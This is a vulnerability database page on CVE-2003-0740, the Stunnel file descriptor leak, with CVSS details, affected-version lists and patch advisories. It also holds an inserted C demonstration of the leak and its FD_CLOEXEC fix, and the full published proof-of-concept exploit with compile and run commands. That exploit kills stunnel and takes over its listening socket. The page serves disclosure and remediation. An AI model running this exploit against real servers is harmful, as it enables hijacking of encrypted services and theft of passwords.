CVE-2003-0740
CVSS 4.6
Published: 2003-10-20 00:00:00
Revised: 2016-10-17 22:37:06

[Original] Stunnel 4.00, and 3.24 and earlier, leaks a privileged file descriptor returned by listen(), which allows local users to hijack the Stunnel server.


[CNNVD] Stunnel file descriptor leak vulnerability (CNNVD-200310-047)

        
Stunnel is a program that wraps arbitrary TCP connections in SSL, so that applications and services without native SSL support can be reached over an encrypted channel.
Stunnel has a file descriptor leak. A local attacker can use it to hijack the Stunnel server, which can lead to unauthorized access to the encrypted connections it terminates and similar attacks.
The cause is that Stunnel does not mark its privileged descriptors close-on-exec with fcntl(FD_CLOEXEC), so the listening socket (the descriptor on which listen() was called) is inherited by the unprivileged programs Stunnel launches. If Stunnel is used to provide shell access through any local program (telnet, for example), the user's shell also holds the leaked listening descriptor, which means any user who can get shell access can hijack the stunnel daemon. As a result, an unprivileged attacker can take control of the service, harvest passwords and other sensitive information, or redirect the service to a different machine.
Other file descriptors are leaked in the same way.
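As an added example (this is not code from the page, the advisory or stunnel itself), the following C program reproduces the root cause described above and its fix: a listening socket created without FD_CLOEXEC is still open in a child program after fork()+exec(), while one marked close-on-exec with fcntl() is not. It also shows the attacker-side check a local user would run inside the spawned program instead of guessing the descriptor number: scan the low descriptors for one that reports SO_ACCEPTCONN. The function names (make_listener, set_cloexec, exec_child_sees_fd, find_inherited_listener), the loopback listener and the /bin/sh probe are this example's own choices and are not taken from stunnel.

```c
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Create a listening TCP socket on 127.0.0.1 with a kernel-chosen port
 * (constructed for this example; stands in for stunnel's -d listener). */
static int make_listener(void)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 5) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* The fix the vulnerable versions lacked: mark the descriptor close-on-exec. */
static int set_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* Fork and exec a child program, then report whether `fd` was still open in
 * it. The child is /bin/sh running `: <&N`; that redirection fails with EBADF
 * when descriptor N was closed by exec, so the shell exits non-zero.
 * Returns 1 if the descriptor leaked, 0 if it was closed, -1 on error. */
static int exec_child_sees_fd(int fd)
{
    char script[64];
    snprintf(script, sizeof script, "exec 2>/dev/null; : <&%d", fd);
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", script, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 0 ? 1 : 0;
}

/* Vulnerable pattern (stunnel <= 3.24 / 4.00): listener inherited across exec. */
int listener_leaks_when_unprotected(void)
{
    int fd = make_listener();
    if (fd < 0)
        return -1;
    int leaked = exec_child_sees_fd(fd);
    close(fd);
    return leaked;
}

/* Fixed pattern: FD_CLOEXEC set before any fork/exec of a local program. */
int listener_leaks_when_cloexec(void)
{
    int fd = make_listener();
    if (fd < 0)
        return -1;
    if (set_cloexec(fd) < 0) {
        close(fd);
        return -1;
    }
    int leaked = exec_child_sees_fd(fd);
    close(fd);
    return leaked;
}

/* From the launched program's side: instead of hard-coding descriptor 6 as
 * the published exploit does, scan descriptors 0..max_fd and return the first
 * one that is a listening socket (SO_ACCEPTCONN), or -1 if none is inherited. */
int find_inherited_listener(int max_fd)
{
    for (int fd = 0; fd <= max_fd; fd++) {
        int accepting = 0;
        socklen_t len = sizeof accepting;
        if (getsockopt(fd, SOL_SOCKET, SO_ACCEPTCONN, &accepting, &len) == 0 && accepting)
            return fd;
    }
    return -1;
}

int main(void)
{
    printf("without FD_CLOEXEC: child still holds listener? %d\n", listener_leaks_when_unprotected());
    printf("with FD_CLOEXEC:    child still holds listener? %d\n", listener_leaks_when_cloexec());
    int fd = make_listener();
    printf("listener found by scan: fd %d (created as fd %d)\n", find_inherited_listener(64), fd);
    close(fd);
    return 0;
}
```

Setting the flag with fcntl() after socket() still leaves a window in a threaded program where another thread can fork and exec between the two calls; on Linux 2.6.27 and later the flag can be requested atomically with socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, 0). On the defender side, `ls -l /proc/<pid>/fd` or `lsof -p <pid>` on the program stunnel launched shows the same inherited listening socket this scan finds.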
        

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no special access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:stunnel:stunnel:3.20
cpe:/a:stunnel:stunnel:3.9
cpe:/a:stunnel:stunnel:3.10
cpe:/a:stunnel:stunnel:3.21
cpe:/a:stunnel:stunnel:3.21c
cpe:/a:stunnel:stunnel:3.8
cpe:/a:stunnel:stunnel:3.11
cpe:/a:stunnel:stunnel:3.21b
cpe:/a:stunnel:stunnel:3.22
cpe:/a:stunnel:stunnel:3.7
cpe:/a:stunnel:stunnel:3.21a
cpe:/a:stunnel:stunnel:3.16
cpe:/a:stunnel:stunnel:3.17
cpe:/a:stunnel:stunnel:4.0
cpe:/a:stunnel:stunnel:3.18
cpe:/a:stunnel:stunnel:3.19
cpe:/a:stunnel:stunnel:3.12
cpe:/a:stunnel:stunnel:3.13
cpe:/a:stunnel:stunnel:3.24
cpe:/a:stunnel:stunnel:3.14
cpe:/a:stunnel:stunnel:3.15
cpe:/a:stunnel:stunnel:3.3
cpe:/a:stunnel:stunnel:3.4a

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0740
(official source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0740
(official source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-047
(official source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000736
(UNKNOWN)  CONECTIVA  CLA-2003:736
http://marc.info/?l=bugtraq&m=106260760211958&w=2
(UNKNOWN)  BUGTRAQ  20030903 Stunnel-3.x Daemon Hijacking
http://www.mandriva.com/security/advisories?name=MDKSA-2003:108
(UNKNOWN)  MANDRAKE  MDKSA-2003:108
http://www.redhat.com/support/errata/RHSA-2003-297.html
(UNKNOWN)  REDHAT  RHSA-2003:297

- Vulnerability information

Stunnel file descriptor leak vulnerability
Medium  Other
2003-10-20 00:00:00 2005-10-20 00:00:00
Local
        
        

- Advisories and patches

Vendor patches:
Stunnel
-------
The vendor has released an upgrade that fixes this issue; download it from the vendor's site:
Stunnel Upgrade stunnel-4.04.tar.gz

http://www.stunnel.org/download/stunnel/src/stunnel-4.04.tar.gz

- Vulnerability information (91)

Stunnel <= 3.24, 4.00 Daemon Hijacking Proof of Concept Exploit (EDBID:91)
linux local
2003-09-05 Verified
0 Steve Grubb
N/A
/* By Steve Grubb : The technique is simple.
 *
 * 1) Fork so that stunnel can't find you when it dies.
 * 2) Send stunnel a SIGUSR2. Unhandled signals generally
 *    kill programs. Since you are a child of stunnel, the OS
 *    will deliver the signal.
 * 3) Select on the leaked descriptor and start serving pages.
 *
 * At the end of this advisory is a proof-of-concept
 * program that you can run under Stunnel. It is assumed
 * that Stunnel is providing you shell-like access (Telnet
 * over SSL, for example), or that the program launched via
 * Stunnel has some exploitable condition that allows you
 * to run arbitrary code.
 *
 * To run the POC code, you can execute it directly as the
 * local program (-l argument) for Stunnel:
 *
 * /usr/sbin/stunnel -s nobody -g nobody -D 7 -p /etc/ssl/certs/stunnel.pem -o /tmp/stunnel.log -P /tmp/stunnel.pid -d 2222 -l /opt/stunnel-sploit/leak-sploit -- leak-sploit
 *
 * Then connect to stunnel like: lynx https://localhost:2222
 *
 * The first time, you will get a message saying
 * "Unexpected network read error" followed by "Document
 * can't be accessed". Then connect again. The second
 * time, you will see the "You're owned" message. Doing a
 * ps -ef shows that stunnel is long gone and replaced by
 * the example application... even though user & group were
 * nobody. Sure, it's a bit contrived, but it illustrates the concept.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

/*
 * The basic scheme goes like this:
 *      1) Get rid of the parent
 *      2) init the openssl library
 *      3) start handling requests
 */

/* You may need to adjust these next 3 items. LISTEN_DESCRIPTOR is the
 * number of the listening socket stunnel leaked into this process
 * (6 in the author's setup; check /proc/self/fd or lsof if it differs). */
#define LISTEN_DESCRIPTOR 6
#define CERTF "/opt/stunnel-sploit/foo-cert.pem"
#define KEYF  "/opt/stunnel-sploit/foo-cert.pem"

static SSL_CTX          *ctx;
static SSL              *ssl;
static const SSL_METHOD *meth;

static void server_loop(int descr);
static void ssl_init(void);

int main(int argc, char *argv[])
{
    pid_t pid = getppid();   /* the stunnel daemon that launched us */

    (void)argc; (void)argv;
    /* Need to fork so stunnel doesn't kill us when it goes down */
    if (fork() == 0) {
        /* Become session leader, detached from stunnel's process group */
        setsid();

        /* Goodbye - thanks for the descriptor. stunnel installs no handler
         * for SIGUSR2, so the default action terminates it. */
        kill(pid, SIGUSR2);
        close(0); close(1); close(2);
        ssl_init();
        server_loop(LISTEN_DESCRIPTOR);
    }
    return 0;
}

static void server_loop(int descr)
{
    static const char body[] = "<html><body>You're owned!</body></html>";
    fd_set read_mask;

    for (;;) {
        struct sockaddr_in remote;
        socklen_t len = sizeof(remote);
        int fd;

        /* select() modifies the set, so rebuild it on every iteration */
        FD_ZERO(&read_mask);
        FD_SET(descr, &read_mask);
        if (select(descr + 1, &read_mask, NULL, NULL, NULL) == -1)
            continue;
        /* accept() on the listener stunnel left open in our process */
        fd = accept(descr, (struct sockaddr *)&remote, &len);
        if (fd >= 0) {
            char obuf[4096];

            if ((ssl = SSL_new(ctx)) != NULL) {
                SSL_set_fd(ssl, fd);
                SSL_set_accept_state(ssl);
                if (SSL_accept(ssl) <= 0)
                    exit(1);
                /* Content-Length is derived from the body so the two never disagree */
                snprintf(obuf, sizeof(obuf),
                         "HTTP/1.0 200 OK\n"
                         "Content-Length: %zu\n"
                         "Content-Type: text/html\n\n%s",
                         strlen(body), body);
                SSL_write(ssl, obuf, strlen(obuf));
                SSL_set_shutdown(ssl, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
                SSL_free(ssl);
                ERR_remove_state(0);
            }
            close(fd);
        }
    }
    SSL_CTX_free(ctx);  /* Never gets called */
}

/* OpenSSL 0.9.x-era initialisation as published in 2003; current OpenSSL
 * still accepts these names as deprecated aliases. */
static void ssl_init(void)
{
    SSL_load_error_strings();
    SSLeay_add_ssl_algorithms();
    meth = SSLv23_server_method();
    ctx = SSL_CTX_new(meth);
    if (!ctx)
        exit(1);
    if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0)
        exit(1);
    if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0)
        exit(1);
    if (!SSL_CTX_check_private_key(ctx))
        exit(1);
}


// milw0rm.com [2003-09-05]

- Vulnerability information

6451
Stunnel File Descriptor Leak Session Hijack
Local Access Required
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

2003-09-03 Unknown
Unknown Unknown

- Solution

Upgrade to version 3.26, 4.04 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Stunnel Leaked File Descriptor Vulnerability
Failure to Handle Exceptional Conditions 8537
Remote: No  Local: Yes
2003-09-03 12:00:00 2009-07-11 11:56:00
Discovery of this issue has been credited to Steve Grubb <linux_4ever@yahoo.com>.

- Affected versions

Stunnel Stunnel 4.0 0
Stunnel Stunnel 3.24
Stunnel Stunnel 3.22
- Conectiva Linux 9.0
- Conectiva Linux 8.0
+ EnGarde Secure Community 2.0
+ EnGarde Secure Community 1.0.1
+ EnGarde Secure Professional 1.5
+ EnGarde Secure Professional 1.2
+ EnGarde Secure Professional 1.1
+ Sun Linux 5.0.7
Stunnel Stunnel 3.21 c
Stunnel Stunnel 3.21 b
Stunnel Stunnel 3.21 a
Stunnel Stunnel 3.21
Stunnel Stunnel 3.19
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
Stunnel Stunnel 3.18
Stunnel Stunnel 3.17
Stunnel Stunnel 3.16
Stunnel Stunnel 3.15
Stunnel Stunnel 3.14
- Conectiva Linux 7.0
Stunnel Stunnel 3.13
Stunnel Stunnel 3.12
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Stunnel Stunnel 3.11
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Stunnel Stunnel 3.9
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
Stunnel Stunnel 3.8
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
Stunnel Stunnel 3.7
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
Stunnel Stunnel 3.4 a
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
Stunnel Stunnel 3.3
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
- Trustix Secure Linux 1.2
- Trustix Trustix Secure Linux 1.1
- Trustix Trustix Secure Linux 1.0
Stunnel Stunnel 3.20
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
Stunnel Stunnel 3.10
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Sun Solaris 8_sparc
- Sun Solaris 7.0
SGI ProPack 2.3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Mandriva Linux Mandrake 9.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
Stunnel Stunnel 4.0 4
Stunnel Stunnel 4.0 3
Stunnel Stunnel 4.0 2
Stunnel Stunnel 4.0 1
Stunnel Stunnel 3.26

- Unaffected versions

Stunnel Stunnel 4.0 4
Stunnel Stunnel 4.0 3
Stunnel Stunnel 4.0 2
Stunnel Stunnel 4.0 1
Stunnel Stunnel 3.26

- Discussion

Stunnel has been reported prone to a file descriptor leakage vulnerability. It has been reported that, file descriptors returned by a listen() call are made available to unprivileged processes. As a result, an unprivileged attacker may exploit this issue to hijack the Stunnel Server.

Other file descriptors are also reportedly leaked, which may also be potentially exploited in a similar manner.

- Exploit

The following proof-of-concept code has been supplied:

To compile:
$(CC) $(CFLAGS) -o $@ leak-sploit.c -lssl
(on current toolchains libcrypto must be linked explicitly as well: add -lcrypto)

To run the POC code, you can execute it directly as the local program (-l argument) for Stunnel:

/usr/sbin/stunnel -s nobody -g nobody -D 7 -p /etc/ssl/certs/stunnel.pem -o /tmp/stunnel.log -P /tmp/stunnel.pid -d 2222 -l /opt/stunnel-sploit/leak-sploit -- leak-sploit

Then connect to stunnel like: lynx https://localhost:2222

- Solution

Conectiva has released an advisory (CLA-2003:736) to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisories RHSA-2003:297-07 and RHSA-2003:296-01 to address this issue. See the referenced advisories for additional details.

Mandrake has released a security advisory (MDKSA-2003:108) to address this issue in 9.0 and Corporate Server 2.1. Users are advised to upgrade as soon as possible.

SGI has released an advisory (20031103-01-U) pertaining to their ProPack Linux distribution. The advisory has been released in response to a number of RHSA advisories, and includes a patch (Patch 10033) containing updated RPM packages relating to a number of different BIDS.

Patch 10033 can be obtained via the following link:
http://support.sgi.com/

For information regarding how to obtain individual RPM packages included in Patch 10033, please see the attached advisory.

The vendor has released upgrades to address this issue for the following products:

Stunnel Stunnel 3.20
Stunnel Stunnel 3.10
MandrakeSoft Corporate Server 2.1
MandrakeSoft Corporate Server 2.1 x86_64
Stunnel Stunnel 3.11
Stunnel Stunnel 3.12
Stunnel Stunnel 3.13
Stunnel Stunnel 3.14
Stunnel Stunnel 3.15
Stunnel Stunnel 3.16
Stunnel Stunnel 3.17
Stunnel Stunnel 3.18
Stunnel Stunnel 3.19
Stunnel Stunnel 3.21
Stunnel Stunnel 3.21 c
Stunnel Stunnel 3.21 b
Stunnel Stunnel 3.21 a
Stunnel Stunnel 3.22
Stunnel Stunnel 3.24
Stunnel Stunnel 3.3
Stunnel Stunnel 3.4 a
Stunnel Stunnel 3.7
Stunnel Stunnel 3.8
Stunnel Stunnel 3.9
Stunnel Stunnel 4.0 0
Mandriva Linux Mandrake 9.0

- References

 

 
